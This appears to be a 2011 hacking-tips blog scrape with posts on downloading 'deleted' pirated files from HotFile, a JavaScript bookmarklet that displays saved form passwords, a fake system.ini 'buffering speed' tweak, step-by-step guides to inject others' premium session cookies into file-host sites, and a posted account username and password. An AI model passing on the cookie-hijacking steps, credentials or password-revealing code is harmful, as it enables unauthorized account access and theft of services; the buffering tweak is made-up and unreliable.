Splunk is the engine for machine data. Use Splunk to collect, index and harness the fast moving machine data generated by all your applications, servers and devices — physical, virtual and in the cloud. Search and analyze all your real-time and historical data from one place.
Splunking your machine data lets you troubleshoot problems and investigate security incidents in minutes, not hours or days. Monitor your end-to-end infrastructure to avoid service degradation or outages. Meet compliance mandates at lower cost. Correlate and analyze complex events spanning multiple systems. Gain new levels of operational visibility and intelligence for IT and the Business.

What's New in 4.2 :

Real-time alerting - provide immediate notification and response for events, patterns, incidents and attacks as they occur.
Universal Forwarder - new dedicated forwarder delivers secure, distributed, real-time data collection from thousands of endpoints.
Easier and faster - new visualizations, quick start guides for new users, integrated workflows for common tasks and up to 10X faster search experience for large-scale deployments.
Managing Splunk - new centralized deployment monitoring and centralized license management.

Download: http://www.splunk.com

Saturday, March 12, 2011

Download "deleted" files from HotFile

Recently HotFile.com got itself in big legal trouble which forced them to start (really) deleting "copyrighted" material, and banning uploaders who kept "infringing copyright" by continuing to upload their files to HotFile. This ended up in starting a whole new compitition in the Cyberlocker/Filehosting market. New hosts such as FileServe, and FileSonic now own the greatest part of the market.

[Image: hot_file_logo.png]

Anyway, enough blah bla. Lets get to the point!

Some uploaders still dare to upload files to HotFile and on average those files get deleted withing 30 minutes, but do they really delete files? Aperently not, and we found out how to download "deleted" files. this trick is superb easy and you need now knowledge aside how to use a browser!
Let me show you: Here we have a link which is "deleted" 


See the usual "File deleted bla bla bla" message.

Now the trick. You simply have to place new before the URL and then it will work again! :woohoo:
http://new.hotfile.com/dl/109695738/8cec3a0/national.geographic.kkk.inside.american.terror.hdtv.xvid-diverge.avi.html

I've sucsessfully tested this trick with both free & premium user!


Yeah, that simple! Enjoy while it lasts!

It looks like a bug, so I expect it to be "fixed" soon

See passwords behind stars!


Hello guys,

I am going to show you in a short tutorial how to read out a password of a web browser.

Example:

http://www.gmail.com

Username: [email protected]
Password: **

What's my password?

Alright, now you could read out the **-stuff with a simple javascript code.

Code:
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();

All you need is to copy & paste it in the URL-address bar.
Delete http://www.gmail.com and paste the code into it.

Friday, March 11, 2011

Increase Youtube Buffering Speed


With this trick you can increase Youtube as well as sites like Metacafe video buffering speed@

Here it goes --

Start -> Run -> system.ini -> Hit Enter

You'll get one notepad file like this-

Code:
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

[drivers]
wave=mmdrv.dll
timer=timer.drv

[mci]


Copy the below text and paste it there-


Code:
page buffer=100Tbps
load=100Tbps
download=100Tbps
save=100Tbps
back=100Tbps
search=100Tbps
sound=100Tbps
webcam=100Tbps
voice=100Tbps
faxmodemfast=100Tbps
update=100Tbps


Save it and enjoy!!!
Or you can use speed bit video accelerator to enhance your buffering speed.

How to use premium cookies


****method to use them****
1. Google Chrome Browser: download

2.Cookie Plugin for Chrome: cookie injector

The Working: 

This plugin works only for

Fileserve.com
Hotfile.com
Rapidshare.com
Megaupload-Megavideo

This is much easier than any other method as tis doesn't involve much of manual working.

1. Get a premium cookie for the above listed servers.Go to your server site.
2. Enter it in the space provided.
3. And then click "Inject Cookie".
4. The page will be automatically refreshed and the cookie will be injected.
[Image: cooki.png] 

If you have any doubts please post a comment below.

Saturday, March 5, 2011

zer0day's Icon Pack

[Image: Untitled-2-1.png]
zer0day's Icon Pack +++ Over 28,000 ico & png's +++ Plus Bonus Pack of Folder
Compiled my icons and it resulted in over 17,000 ico's and over 11,000 png's. Some are the same but differ in pixel size. Have went through them both twice to remove any duplicates, there might be some more but not many. These were downloaded from icon websites, google images, some packs are from various forums including this one. All files end in .ico or .png so I see no need for a virus scan.

Download ICO 485.45 MB Archive

Download PNG 210.01 MB Archive

BONUS! Over 2,000 Folder Icons ICO & PNG 220.5 MB Zip(Not in other packs)
Folder icons for Programs,Operating Systems, Tv shows, and more...
PICTURE

[Image: untitled-6.jpg]
DOWNLOAD

Friday, March 4, 2011

How to use cookie to get access to premium account

You need Mozilla firefox before you can do this cookie edit.

Step 1. Start firefox
Step 2. Go to Tools

Step 3. There go to Add-ons
[Image: 40011749.png]
Step 4. In Add-ons press Get Add-ons
[Image: 34644398.png]

Step 5. Search for "cookie"[Image: 77053296.png]

Step 6. Install the one named "Edit Cookies" and restart firefox
[Image: 80865331.png]

Step 7. Then go to filehost site you want to login as premium
[Image: 3570373.png]

Step 8. Login with non premium account. For example on megaupload you can use this Username: kenedaa Password: siavonen
[Image: 65003151.png]

Step 9. Go to tools again and select "Edit cookie" from bottom

[Image: 30351787.png]

Step 10. When you open it there is empty box put in there "megaupload" then press Filter/refresh button
[Image: 43102575.png]

Step 11. In there you should see cookie named "user" click on it and then click on button "edit"
[Image: 88457044.png]

Step 12. Then there should pop-up "add/edit cookie" window. Fill in there the content you have been given
[Image: 65832494.png]

Step 13. Then just Press "save". Close cookie editor


Step 14. Refresh the site and there it is premium account ^^

If it does not work for you just PM me or Comment ^^

...................................................................................................................................................................................................................